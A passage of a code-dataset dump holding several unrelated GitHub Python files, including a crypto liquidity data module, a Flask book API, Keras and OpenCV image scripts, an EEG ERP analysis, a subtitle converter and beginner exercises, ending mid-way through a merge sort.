\n    @classmethod\n    def to_pyarrow_schema(cls, small_candles=False) -> pa.Schema:\n        \"\"\"Construct schema for writing Parquet files for these candles.\n\n        :param small_candles: Use even smaller word sizes for frequent (1m) candles.\n        \"\"\"\n        schema = pa.schema([\n            (\"pair_id\", pa.uint32()),\n            (\"timestamp\", pa.timestamp(\"s\")),\n            (\"exchange_rate\", pa.float32()),\n            (\"open\", pa.float32()),\n            (\"close\", pa.float32()),\n            (\"high\", pa.float32()),\n            (\"low\", pa.float32()),\n            (\"adds\", pa.uint16() if small_candles else pa.uint32()),\n            (\"removes\", pa.uint16() if small_candles else pa.uint32()),\n            (\"syncs\", pa.uint16() if small_candles else pa.uint32()),\n            (\"add_volume\", pa.float32()),\n            (\"remove_volume\", pa.float32()),\n            (\"start_block\", pa.uint32()),  # Should be good for 4B blocks\n            (\"end_block\", pa.uint32()),\n        ])\n        return schema\n\n    @classmethod\n    def to_dataframe(cls) -> pd.DataFrame:\n        \"\"\"Return an empty Pandas dataframe presenting a liquidity sample.\"\"\"\n\n        # TODO: Does not match the spec 1:1 - but only used as empty in tests\n        fields = dict([\n            (\"pair_id\", \"int\"),\n            (\"timestamp\", \"datetime64[s]\"),\n            (\"exchange_rate\", \"float\"),\n            (\"open\", \"float\"),\n            (\"close\", \"float\"),\n            (\"high\", \"float\"),\n            (\"low\", \"float\"),\n            (\"buys\", \"float\"),\n            (\"sells\", \"float\"),\n            (\"add_volume\", \"float\"),\n            (\"remove_volume\", \"float\"),\n            (\"start_block\", \"float\"),\n            (\"end_block\", \"float\"),\n        ])\n        df = pd.DataFrame(columns=fields.keys())\n        return df.astype(fields)\n\n\n@dataclass_json\n@dataclass\nclass LiquidityResult:\n    \"\"\"Server-reply for live queried liquidity data.\"\"\"\n\n    #: A bunch of liquidity events.\n    #: Events are unordered and subject to client side sorting.\n    #: Multiple pairs and chains may be present.\n    liquidity_events: List[XYLiquidity]\n\n    def sort_by_timestamp(self):\n        \"\"\"In-place sorting of liquidity events by their timestamp.\"\"\"\n        self.liquidity_events.sort(key=lambda c: c.timestamp)  # fixed: referenced a nonexistent self.candles\n\n\nclass GroupedLiquidityUniverse(PairGroupedUniverse):\n    \"\"\"A universe where each trading pair has its own liquidity data feed.\n\n    This is helper class to create foundation for multi pair strategies.\n\n    For the data logistics purposes, all candles are lumped together in single columnar data blobs.\n    However, it rarely makes sense to execute operations over different trading pairs.\n    :py:class`GroupedLiquidityUniverse` creates trading pair id -> liquidity sample data grouping out from\n    raw liquidity sample.\n    \"\"\"\n\n    def get_liquidity_samples_by_pair(self, pair_id: PrimaryKey) -> Optional[pd.DataFrame]:\n        \"\"\"Get samples for a single pair.\n\n        If the pair does not exist return `None`.\n        \"\"\"\n        try:\n            return self.get_samples_by_pair(pair_id)\n        except KeyError:\n            return None\n\n    def get_closest_liquidity(self, pair_id: PrimaryKey, when: pd.Timestamp, kind=\"open\", look_back_time_frames=5) -> USDollarAmount:\n        \"\"\"Get the available liquidity for a trading pair at a specific timepoint or some candles before the timepoint.\n\n        The liquidity is defined as one-sided as in :term:`XY liquidity model`.\n\n        :param pair_id: Trading pair id\n        :param when: Timestamp to query\n        :param kind: One of liquidity samples: \"open\", \"close\", \"low\", \"high\"\n        :param look_back_time_frames: If there is no liquidity sample available at the exact timepoint,\n            look to the past to get the nearest sample\n        :return: The liquidity sample in US dollars\n        :raise LiquidityDataUnavailable: There was no liquidity sample available\n        \"\"\"\n\n        assert kind in (\"open\", \"close\", \"high\", \"low\"), f\"Got kind: {kind}\"\n\n        start_when = when\n        samples_per_pair = self.get_liquidity_samples_by_pair(pair_id)\n        assert samples_per_pair is not None, f\"No liquidity data available for pair {pair_id}\"\n\n        samples_per_kind = samples_per_pair[kind]\n        for attempt in range(look_back_time_frames):\n            try:\n                sample = samples_per_kind[when]\n                return sample\n            except KeyError:\n                # Go to the previous sample\n                when -= 
self.time_bucket.to_timedelta()\n\n raise LiquidityDataUnavailable(f\"Could not find any liquidity samples for pair {pair_id} between {when} - {start_when}\")\n\n @staticmethod\n def create_empty() -> \"GroupedLiquidityUniverse\":\n \"\"\"Create a liquidity universe without any data.\"\"\"\n return GroupedLiquidityUniverse(df=XYLiquidity.to_dataframe(), index_automatically=False)\n","repo_name":"cjelsa/trading-strategy","sub_path":"tradingstrategy/liquidity.py","file_name":"liquidity.py","file_ext":"py","file_size_in_byte":8579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"641746613","text":"'''\n17. Letter Combinations of a Phone Number\nhttps://leetcode.com/problems/letter-combinations-of-a-phone-number/\n'''\n\n\nclass Solution:\n def letterCombinations(self, digits: str) -> List[str]:\n if digits == \"\":\n return []\n \n digit_map = {\n '2': 'abc',\n '3': 'def',\n '4': 'ghi',\n '5': 'jkl',\n '6': 'mno',\n '7': 'pqrs',\n '8': 'tuv',\n '9': 'wxyz'\n }\n \n def backtrack(curr):\n if len(curr) == len(digits):\n ans.append(''.join(curr))\n return\n for c in digit_map[digits[len(curr)]]:\n curr.append(c)\n backtrack(curr)\n curr.pop()\n \n ans = []\n backtrack([])\n return ans ","repo_name":"supawichable/leetcode","sub_path":"0017_letter_combinations_of_a_phone_numeber.py","file_name":"0017_letter_combinations_of_a_phone_numeber.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44898317835","text":"\"\"\"\r\nAuthor: Phuc Tran\r\nApp Name: APIs\r\nPurpose: Create APIs for Web\r\n\"\"\"\r\n\r\nfrom flask import Flask, request\r\nfrom flask_sqlalchemy import SQLAlchemy\r\n\r\napp = Flask(__name__)\r\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///book_data.db\"\r\napp.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\r\ndb = SQLAlchemy(app)\r\n\r\n\r\nclass Book(db.Model):\r\n id = db.Column(db.Integer,\r\n primary_key=True)\r\n book_name = db.Column(db.String(100),\r\n unique=True,\r\n nullable=False)\r\n author = db.Column(db.String(50),\r\n nullable=False)\r\n publisher = db.Column(db.String(50),\r\n nullable=False)\r\n\r\n def __repr__(self):\r\n return f\"{self.book_name} by {self.author}, published by {self.publisher}\"\r\n\r\ndef init_db():\r\n db.create_all()\r\n book = Book(book_name=\"name\", author=\"author\", publisher=\"publisher\")\r\n db.session.add(book)\r\n db.session.commit()\r\n\r\n@app.route(\"/\")\r\ndef welcome():\r\n return \"Website Provide Book's Information!!!\"\r\n\r\n@app.route(\"/books\")\r\ndef get_books():\r\n books = Book.query.all()\r\n output = []\r\n\r\n for book in books:\r\n book_info = {\"name\": book.book_name,\r\n \"author\": book.author,\r\n \"publisher\": book.publisher}\r\n output.append(book_info)\r\n\r\n return {\"books\": output}\r\n\r\n@app.route(\"/books/<id>\")\r\ndef get_book(id):\r\n book = Book.query.get_or_404(id)\r\n return {\"name\": book.book_name,\r\n \"author\": book.author,\r\n \"publisher\": book.publisher}\r\n\r\n@app.route(\"/books\", methods=[\"POST\"])\r\ndef add_book():\r\n book = Book(book_name=request.json[\"name\"],\r\n author=request.json[\"author\"],\r\n publisher=request.json[\"publisher\"])\r\n db.session.add(book)\r\n db.session.commit()\r\n return {\"id\": book.id}\r\n\r\n@app.route(\"/books/<id>\", methods=[\"DELETE\"])\r\ndef del_book(id):\r\n book = Book.query.get(id)\r\n if book is None:\r\n return {\"error\": \"not found\"}\r\n 
db.session.delete(book)\r\n    db.session.commit()\r\n    return {\"message\": \"Completed!!!\"}\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    init_db()\r\n","repo_name":"htp1988/SDEV220","sub_path":"M04Lab_CaseStudy.py","file_name":"M04Lab_CaseStudy.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23726667457","text":"# -*- coding=utf-8 -*-\nimport os\nimport sys\nimport pickle\nimport numpy as np\n\nimport resnet\nfrom keras.preprocessing import image  # added: ImageDataGenerator below needs this import, which was missing in the original\nfrom image_set import ImageSet, CacheMode\nfrom learning_bot import LearningBot, DrawMethod\n\ndef main():\n    image_set = ImageSet.load(sys.argv[1], 240, 320)\n    image_set.split(train_rate=0.9, seed=\"numazu_shine\")\n    \n    model = resnet.ResnetBuilder.build_resnet_18(\n        (image_set.color, image_set.height, image_set.width), image_set.num_classes)\n    model.summary()\n    bot = LearningBot(model)\n\n    history = {}\n    for image_data in image_set.get_iter_for_learning_curve(5):\n        size = len(image_data[0])\n        \n        datagen = image.ImageDataGenerator(\n            zca_whitening=True,\n            rotation_range=10,\n            width_shift_range=0.2,\n            height_shift_range=0.2,\n            shear_range=0.5,\n            zoom_range=0.3,\n            channel_shift_range=0.,\n            horizontal_flip=True)\n        datagen.fit(image_data[0])\n\n        history[size] = bot.learn_by_generator(*image_data, datagen, batch_size=128, steps_per_epoch=size/128 )\n\n    bot.draw_history_list('test.png', history, [\"acc\", \"val_acc\"], method=DrawMethod.best)\n\nif __name__ == \"__main__\":\n    main()","repo_name":"ousquid/numazu-shine","sub_path":"numazu_shine.py","file_name":"numazu_shine.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6888924544","text":"import numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\nimport os\nfrom os import listdir\n\n\ndef is_image(file_name):\n    file_extension = file_name.split('.')[-1]\n    if file_extension in ('jpg', 'JPG', 'jpeg', 'JPEG', 'tif', 'TIF', 'png', 'PNG', 'bmp', 'BMP'):\n        return True\n    else:\n        return False\n\n\n# https://docs.opencv.org/3.3.0/d5/df0/group__ximgproc__segmentation.html#ga5e3e721c5f16e34d3ad52b9eeb6d2860\nclass Segmentator:\n    def __init__(\n            self,\n            contrast_alpha=1.5,\n            contrast_beta=-100,\n            mean_filtering_sp=7,\n            mean_filtering_sr=25,\n            mean_filtering_level=0,\n            segmentation_sigma=0.8,\n            segmentation_k=600,\n            segmentation_min=1\n    ):\n        self.contrast_alpha = contrast_alpha\n        self.contrast_beta = contrast_beta\n\n        self.mean_filtering_sp = mean_filtering_sp\n        self.mean_filtering_sr = mean_filtering_sr\n        self.mean_filtering_level = mean_filtering_level\n\n        self.segmentation_sigma = segmentation_sigma\n        self.segmentation_k = segmentation_k\n        self.segmentation_min = segmentation_min\n\n        cv2.setUseOptimized(True)\n        cv2.setNumThreads(16)\n\n    def folder_segmentation(self, folder_path, result_path=None, start=0, show_result=False):\n        result = list()\n        files = listdir(folder_path)\n        n_files = len(files)\n        for idx, file in enumerate(files):\n            if idx < start:\n                continue\n            if is_image(file):\n                print('%s Completed [%d/%d]' % (file, n_files, idx + 1))\n                result.append(\n                    self.file_segmentation(\n                        img_path=folder_path + '/' + file,\n                        show_result=show_result\n                    )\n                )\n                if result_path is not None:\n                    if not os.path.exists(result_path):\n                        os.makedirs(result_path)\n                    plt.imsave(result_path + '/' + file, result[-1])\n\n        return result\n\n    def file_segmentation(self, img_path, show_result=False):\n        img = np.array(\n            plt.imread(img_path)[1504:1604, 
380:1920 - 380, :]\n )\n return self.segmentation(\n img=img,\n img_name=img_path.split('/')[-1],\n show_result=show_result\n )\n\n def segmentation(self, img, img_name='Original', show_result=False):\n # Remove boundary data\n img_mask = np.array(img >= 20).astype(dtype=np.uint8)\n img_h = img.shape[0]\n img_w = img.shape[1]\n\n # Adjust contrast of image\n alpha = self.contrast_alpha\n beta = self.contrast_beta\n img_contrast = img * alpha + beta\n img_contrast = np.clip(img_contrast, 0, 255).astype(dtype=np.uint8)\n\n # Apply mean filtering to image\n mean_filtering = cv2.pyrMeanShiftFiltering(\n src=img_contrast, # Original image\n sp=self.mean_filtering_sp, # Size of spatial window\n sr=self.mean_filtering_sr, # Size of color window\n maxLevel=self.mean_filtering_level # Pyramid level\n )\n\n # Do graph segmentation at image\n ss = cv2.ximgproc.segmentation.createGraphSegmentation(\n sigma=self.segmentation_sigma, # Smoothness\n k=self.segmentation_k, # Neighbor regions\n min_size=self.segmentation_min # Minimum segment size\n )\n segmented = ss.processImage(mean_filtering)\n segmented = np.repeat(\n np.reshape(segmented, [img_h, img_w, 1]),\n repeats=3,\n axis=2\n ).astype(dtype=np.float32)\n segmented = np.multiply(segmented, img_mask)\n\n # Select interest region\n interest_point = (int(img_w / 2), img_h - 4)\n selected_region = np.array(\n segmented == segmented[interest_point[1]][interest_point[0]]\n ).astype(dtype=np.float32)\n\n # Fill holes\n fill = np.zeros((img_h + 2, img_w + 2), dtype=np.uint8)\n cv2.floodFill(\n image=selected_region,\n mask=fill,\n seedPoint=(0, 0),\n newVal=0\n )\n fill = (fill == 0).astype(dtype=np.uint8)[1:-1, 1:-1]\n\n if show_result:\n # Show results =============================================\n # Merge original image and interest region for compare\n merge = (img_contrast * 0.5 + np.repeat(\n np.reshape(\n fill * 125,\n (img_h, img_w, 1)\n ),\n repeats=3,\n axis=2\n )).astype(dtype=np.uint8)\n\n images = [\n img,\n img_contrast,\n mean_filtering,\n segmented,\n selected_region,\n fill,\n merge\n ]\n titles = [\n img_name,\n 'Contrast',\n 'Mean filtering',\n 'Segmented',\n 'Extracted',\n 'Fill',\n 'Merge'\n ]\n\n for idx, (img, title) in enumerate(zip(images, titles)):\n plt.subplot(len(images), 1, idx + 1)\n plt.imshow(img)\n plt.title(title)\n plt.xticks([])\n plt.yticks([])\n\n mng = plt.get_current_fig_manager()\n mng.window.state('zoomed')\n plt.show()\n # ===========================================================\n\n return fill\n","repo_name":"Tamuel/FisheyeDewarping","sub_path":"FisheyeDewarping/cv_segmentation.py","file_name":"cv_segmentation.py","file_ext":"py","file_size_in_byte":5588,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"15927975588","text":"import os\nimport mne\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import signal\n\n# load a sample epoch file\nepo = mne.read_epochs('./EPO/1001_PV0-epo.fif', proj=False, add_eeg_ref=False)\nepo.info['picks'] = None\nepo.pick_channels(epo.ch_names[:64])\n\n# convert time to milliseconds\nt = epo.times*1e3\n\n# load the layout file\nlout = mne.channels.read_layout('biosemi.lay')\n\n# load the erp data\nerp = np.load('evo-all.npy')\nerp *= 1e6 # convert to microvolts\n'''\n# remove some time indices\ntix = np.logical_and(t > 0, t < 500)\nt = t[tix]\nerp = erp[:, :, :, tix]\n'''\n# run the two way anova\nf, p = mne.stats.f_mway_rm(erp, [2, 2])\nf, p = f.reshape(3, 64, -1), p.reshape(3, 64, -1)\n\n# plot the 
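A minimal driver for the Segmentator class above, assuming opencv-contrib-python is installed (cv2.ximgproc lives there). The synthetic image is a stand-in so the sketch stays self-contained; real use would go through file_segmentation or folder_segmentation, and show_result=False avoids the GUI-only code path.

import numpy as np
from matplotlib import pyplot as plt

seg = Segmentator(segmentation_k=600, segmentation_min=1)

# Synthetic RGB frame: a bright block that covers the seed point the class
# picks near the bottom-centre of the image (w/2, h-4).
img = np.zeros((200, 300, 3), dtype=np.uint8)
img[120:, 100:200] = 180

mask = seg.segmentation(img, img_name='synthetic', show_result=False)
plt.imsave('mask.png', mask)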
fmap\nfig = plt.figure()\nfor n in range(64):\n ax = fig.add_axes(lout.pos[n])\n ax.plot(t, f[:, n].T)\n ax.set_ylim((0, f.max()))\n\n# plot the erps\nfig = plt.figure()\nfor n in range(64):\n ax = fig.add_axes(lout.pos[n])\n for m, c in enumerate(['c', 'm', 'b', 'r']):\n ax.plot(t, erp[:, m, n].mean(0), c)\n ax.set_ylim((erp.mean(0).min(), erp.mean(0).max()))\n\nplt.show()\n","repo_name":"snn88/EmoWorM_Analysis","sub_path":"p300.py","file_name":"p300.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"33219190612","text":"import pandas as pd\nimport csv\nimport json\nfrom faker import Faker\nfake = Faker()\n\n\ndef make_fake_custom_fields():\n df1 = pd.read_csv('../fake_data_for_testing.csv')\n i = 0\n custom_fields = list()\n while i < 500:\n field = list()\n account_manager = dict()\n account_manager[\"id\"] = 12345\n account_manager[\"value\"] = fake.name()\n field.append(account_manager)\n \n cc = dict()\n cc[\"id\"] = 6789\n cc[\"value\"] = fake.credit_card_full()\n field.append(cc)\n\n custom_fields.append(\n json.dumps(field)\n )\n i += 1\n df2 = pd.DataFrame({\"custom_fields\":custom_fields})\n df3 = pd.concat([df1,df2],axis=1)\n df3.to_csv(\"../copy.csv\",index=False)\n\n\nif __name__ == \"__main__\":\n make_fake_custom_fields()","repo_name":"aa-ag/sqlexperiments","sub_path":"scripts/generate_fake_data.py","file_name":"generate_fake_data.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"18324203313","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : sort.py\n# @Author: Lizi\n# @Date : 2020/9/7\n'''Read three integers x, y and z, then print them in ascending order.'''\nlist1 = []\nfor i in range(3):\n x = int(input(\"Please enter 3 numbers: \"))\n list1.append(x)\nlist1.sort()\nprint(list1)","repo_name":"rage-vampire/Python","sub_path":"lizi_project/lizi_practise/sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} {"seq_id":"15827590058","text":"#!/usr/bin/env python3\n\n# Author: Suthakar Shiny Gladdys\n# Date Last Modified: 11/3/2022\n\nimport sys, os\nimport pandas as pd\nimport datetime\n\n\ndef time_process(df):\n df[['start_time', 'end_time']] = df['times'].str.split(' ', n=1, expand=True)\n df.drop(['times'], axis=1, inplace=True)\n df = df[['start_time', 'end_time', 'sentence']]\n df.index += 1\n\n # millisecond format standardizing\n df['start_time'] = df['start_time'] + '0'\n df['end_time'] = df['end_time'] + '0'\n\n # splitting start & end times into seconds and milliseconds\n df[['st_1', 'st_2']] = df['start_time'].str.split('.', n=1, expand=True)\n df[['et_1', 'et_2']] = df['end_time'].str.split('.', n=1, expand=True)\n\n # standardizing seconds to HH:MM:SS\n df.st_1 = df.st_1.astype(int)\n df.et_1 = df.et_1.astype(int)\n df = df.reindex(columns = df.columns.tolist() + ['st_1_converted','et_1_converted'])\n\n for row in df.itertuples():\n df.at[row.Index, 'st_1_converted'] = datetime.timedelta(seconds = row.st_1)\n df.at[row.Index, 'et_1_converted'] = datetime.timedelta(seconds = row.et_1) \n\n df.st_1_converted = df.st_1_converted.astype(str)\n df.et_1_converted = df.et_1_converted.astype(str)\n df['st_1_converted'] = '0' + df['st_1_converted']\n df['et_1_converted'] = '0' + df['et_1_converted']\n\n # getting start & end times in SRT time format\n df['st_final'] = df['st_1_converted'] + 
',' + df['st_2']\n df['et_final'] = df['et_1_converted'] + ',' + df['et_2']\n\n return df\n\n\ndef write_to_srt(folder, name, df):\n srt_file_path = os.path.join(folder, name + '.srt')\n srt_file = open(srt_file_path, 'a')\n df.index = df.index.astype(str)\n \n for index, row in df.iterrows():\n srt_file.write(index)\n srt_file.write('\\n')\n srt_file.write(row['st_final'] + ' --> ' + row['et_final'] + '\\n')\n srt_file.write(row['sentence'] + '\\n\\n')\n \n srt_file.close()\n\n\nfolder_path = sys.argv[1]\nos.chdir(folder_path)\nsrt_folder_path = os.path.join(os.path.dirname(os.getcwd()), 'srt')\nos.makedirs(srt_folder_path)\n\nfor file in os.listdir():\n if file.endswith(\".txt\"):\n file_path = f\"{folder_path}\\{file}\"\n file_name = file[:-4]\n file_df = pd.read_csv(file_path, names=['times', 'sentence'], delimiter='\\t')\n process_df = time_process(file_df)\n write_to_srt(srt_folder_path, file_name, process_df)\n\n\n","repo_name":"shinygs/FYP-Conversational-Speech","sub_path":"file_processing/YT_transcript_to_srt/YT_transcript_to_srt.py","file_name":"YT_transcript_to_srt.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4485054526","text":"## 1. Lists ##\n\nrow_2=['Instagram', 0.0, 'USD', 2161558, 4.5]\nrow_3=['Clash of Clans', 0.0, 'USD', 2130805, 4.5]\n\n## 2. Indexing ##\n\nrow_1 = ['Facebook', 0.0, 'USD', 2974676, 3.5]\nrow_2 = ['Instagram', 0.0, 'USD', 2161558, 4.5]\nrow_3 = ['Clash of Clans', 0.0, 'USD', 2130805, 4.5]\nratings_1=row_1[3]\nratings_2=row_2[3]\nratings_3=row_3[3]\ntotal=ratings_1+ratings_2+ratings_3\naverage=total/3\n\n## 3. Negative Indexing ##\n\nrow_1 = ['Facebook', 0.0, 'USD', 2974676, 3.5]\nrow_2 = ['Instagram', 0.0, 'USD', 2161558, 4.5]\nrow_3 = ['Clash of Clans', 0.0, 'USD', 2130805, 4.5]\nrating_1=row_1[-1]\nrating_2=row_2[-1]\nrating_3=row_3[-1]\ntotal_rating=rating_1+rating_2+rating_3\naverage_rating=total_rating/3\n\n## 4. Retrieving Multiple List Elements ##\n\nrow_1 = ['Facebook', 0.0, 'USD', 2974676, 3.5]\nrow_2 = ['Instagram', 0.0, 'USD', 2161558, 4.5]\nrow_3 = ['Clash of Clans', 0.0, 'USD', 2130805, 4.5]\nrow_4 = ['Temple Run', 0.0, 'USD', 1724546, 4.5]\nrow_5 = ['Pandora - Music & Radio', 0.0, 'USD', 1126879, 4.0]\nfb_rating_data=[row_1[0],row_1[3],row_1[4]]\ninsta_rating_data=[row_2[0],row_2[3],row_2[4]]\npandora_rating_data=[row_5[0],row_5[3],row_5[4]]\ntotal=(fb_rating_data[2]+insta_rating_data[2]+pandora_rating_data[2])\navg_rating=total//3\n\n## 5. List Slicing ##\n\nrow_1 = ['Facebook', 0.0, 'USD', 2974676, 3.5]\nrow_2 = ['Instagram', 0.0, 'USD', 2161558, 4.5]\nrow_3 = ['Clash of Clans', 0.0, 'USD', 2130805, 4.5]\nrow_4 = ['Temple Run', 0.0, 'USD', 1724546, 4.5]\nrow_5 = ['Pandora - Music & Radio', 0.0, 'USD', 1126879, 4.0]\nfirst_4_fb=row_1[0:4]\nlast_3_fb=row_1[-3:]\npandora_3_4=[row_5[-3],row_5[-2]]\n\n\n\n## 6. List of Lists ##\n\nrow_1 = ['Facebook', 0.0, 'USD', 2974676, 3.5]\nrow_2 = ['Instagram', 0.0, 'USD', 2161558, 4.5]\nrow_3 = ['Clash of Clans', 0.0, 'USD', 2130805, 4.5]\nrow_4 = ['Temple Run', 0.0, 'USD', 1724546, 4.5]\nrow_5 = ['Pandora - Music & Radio', 0.0, 'USD', 1126879, 4.0]\napp_data_set=[row_1,row_2,row_3,row_4,row_5]\nsum=0.0\nfor i in app_data_set:\n sum=sum+i[4]\navg_rating=sum/5\n \n\n## 7. Opening a File ##\n\nfrom csv import reader\nopened_file=open(\"AppleStore.csv\")\nread_file=reader(opened_file)\napps_data=list(read_file)\nprint(len(apps_data))\nprint(apps_data[0])\nprint(apps_data[2:4])\n\n\n## 8. 
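The padding-and-splitting in time_process above can be condensed into one arithmetic helper targeting the same HH:MM:SS,mmm SRT format; a sketch, not a drop-in replacement for the DataFrame pipeline.

def to_srt_timestamp(seconds: float) -> str:
    # Work in whole milliseconds first so rounding cannot spill into a
    # ',1000' milliseconds field.
    total_ms = round(seconds * 1000)
    s, ms = divmod(total_ms, 1000)
    h, rem = divmod(s, 3600)
    m, s = divmod(rem, 60)
    return f"{h:02d}:{m:02d}:{s:02d},{ms:03d}"

# to_srt_timestamp(75.5) -> '00:01:15,500'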
Repetitive Processes ##\n\nrow_1 = ['Facebook', 0.0, 'USD', 2974676, 3.5]\nrow_2 = ['Instagram', 0.0, 'USD', 2161558, 4.5]\nrow_3 = ['Clash of Clans', 0.0, 'USD', 2130805, 4.5]\nrow_4 = ['Temple Run', 0.0, 'USD', 1724546, 4.5]\nrow_5 = ['Pandora - Music & Radio', 0.0, 'USD', 1126879, 4.0]\n\napp_data_set = [row_1, row_2, row_3, row_4, row_5]\nfor i in app_data_set:\n print(i)\n\n## 9. For Loops ##\n\nrow_1 = ['Facebook', 0.0, 'USD', 2974676, 3.5]\nrow_2 = ['Instagram', 0.0, 'USD', 2161558, 4.5]\nrow_3 = ['Clash of Clans', 0.0, 'USD', 2130805, 4.5]\nrow_4 = ['Temple Run', 0.0, 'USD', 1724546, 4.5]\nrow_5 = ['Pandora - Music & Radio', 0.0, 'USD', 1126879, 4.0]\n\napp_data_set = [row_1, row_2, row_3, row_4, row_5]\nrating_sum=0\nrating=0\nfor i in app_data_set:\n rating=rating+1\n rating_sum=rating_sum+i[4]\navg_rating=rating_sum/rating\n\n \n\n## 10. The Average App Rating ##\n\nfrom csv import reader\nopened_file=open(\"AppleStore.csv\")\nread_file=reader(opened_file)\napps_data=list(read_file)\nrating_sum=0\nrating=0\nfor i in apps_data[1:]:\n rating=rating+1\n rating_sum=rating_sum+float(i[7])\navg_rating=rating_sum/rating \n\n## 11. Alternative Way to Compute an Average ##\n\nfrom csv import reader\nopened_file=open(\"AppleStore.csv\")\nread_file=reader(opened_file)\napps_data=list(read_file)\nall_ratings = []\nfor i in apps_data[1:]:\n all_ratings.append(float(i[7]))\navg_rating=sum(all_ratings)/len(all_ratings) ","repo_name":"J-Kiruthika/Data-Analysis-python","sub_path":"Lists and Indexing .py","file_name":"Lists and Indexing .py","file_ext":"py","file_size_in_byte":3610,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} {"seq_id":"9206808726","text":"# creating python classes(properties x behavior)\n# creating objects from our classes\n#self is used to bind the attributes to the arguments received\n#class Subjects:\n #def __init__(self,name, like, dislike):\n # self.name =name\n # self.like=like\n # self.dislike=dislike\n\n#sub1 = Subjects(\"Physics\",\"Yes\",\"No\")\n#print(\"I like\"+\"\" + sub1.name + \"\" + \"it gets me excited so I say\" + sub1.like + \"to it\")\n\nclass Student:\n def __init__(self,name, age, grade):\n self.name =name\n self.age=age\n self.grade=grade\n\n def get_grade(self):\n return self.grade\nclass Course:\n def __init__(self,name, max_students):\n self.name= name\n self.max_students=max_students\n self.students =[]\n def add_students(self,student):\n if len(self.students) < self.max_students:\n self.students.append(student)\n return True\n return False\n def get_average_grade(self):\n value = 0\n for student in self.students:\n value += student.get_grade()\n return value / len(self.students)\n\n\ns1=Student(\"Cheryl\",21,95)\ns2=Student(\"Jilian\",23,70)\ns3 =Student(\"Travis\",19,68)\n\ncourse= Course(\"Statistics\",3)\ncourse.add_students(s1)\ncourse.add_students(s2)\nprint(course.students[0].name)\nprint(course.get_average_grade())","repo_name":"Cherrypick14/pyclasses_objects_inheritance","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"2870858088","text":"# If K % 2 == 0, go to the right child; if K % 2 == 1, go to the left child.\n# As the depth grows, update K := (K//2) + (K % 2).\n# When a leaf node is reached while updating, that leaf is exactly the node where the K-th marble lands.\n\nimport sys\nsys.setrecursionlimit(10**7)\ninput = sys.stdin.readline\n\nN = int(input())\ngraph = [0 for _ in range(N+1)] # graph[CURRENT] = CURRENT 
node's direct children (LEFT, RIGHT).\n\nfor CURRENT in range(1, N+1):\n LEFT, RIGHT = map(int, input().split())\n\n graph[CURRENT] = (LEFT, RIGHT)\n\nK = int(input())\n\ndef dfs(current):\n global K\n\n if graph[current] == (-1, -1):\n print(current)\n sys.exit()\n \n if graph[current][0] == -1: # if there is no left child\n dfs(graph[current][1]) # go straight to the right child\n\n elif graph[current][1] == -1: # if there is no right child\n dfs(graph[current][0]) # go straight to the left child\n\n else:\n is_left = K % 2 == 1 # if K % 2 == 1 go to the left child, otherwise the right child.\n K = (K // 2) + (K % 2) # K update.\n\n if is_left: # if we should go left\n dfs(graph[current][0]) # go to the left child.\n \n else: # otherwise\n dfs(graph[current][1]) # right child\n\ndfs(1)","repo_name":"SimplePro/Algorithm","sub_path":"나무 위의 구슬.py","file_name":"나무 위의 구슬.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"11440891388","text":"# used Merge Sort code from lecture 6 (Sorting) slides 89 - 90\ndef mergeSort(array, left, right, sortBy):\n if left < right:\n # m is the point where the array is divided into two subarrays\n mid = left + (right - left) // 2\n mergeSort(array, left, mid, sortBy)\n mergeSort(array, mid + 1, right, sortBy)\n # Merge the sorted subarrays\n merge(array, left, mid, right, sortBy)\n\n\ndef merge(array, left, mid, right, sortBy):\n # Create X ← arr[left..mid] & Y ← arr[mid+1..right]\n n1 = mid - left + 1\n n2 = right - mid\n X = [0] * n1\n Y = [0] * n2\n for i in range(0, n1):\n X[i] = array[left + i]\n for i in range(0, n2):\n Y[i] = array[mid + 1 + i]\n # Merge the arrays X and Y into arr\n i = 0\n j = 0\n k = left\n # If sorting by album name\n if sortBy == \"Album Name\":\n while i < n1 and j < n2:\n if X[i].albumName <= Y[j].albumName:\n array[k] = X[i]\n i += 1\n else:\n array[k] = Y[j]\n j += 1\n k += 1\n # If sorting by artist name\n if sortBy == \"Artist Name\":\n while i < n1 and j < n2:\n if X[i].artistName <= Y[j].artistName:\n array[k] = X[i]\n i += 1\n else:\n array[k] = Y[j]\n j += 1\n k += 1\n # If sorting by release date\n if sortBy == \"Release Date\":\n while i < n1 and j < n2:\n if X[i].albumReleaseDate <= Y[j].albumReleaseDate:\n array[k] = X[i]\n i += 1\n else:\n array[k] = Y[j]\n j += 1\n k += 1\n # If sorting by album number of tracks\n if sortBy == \"Album Number of 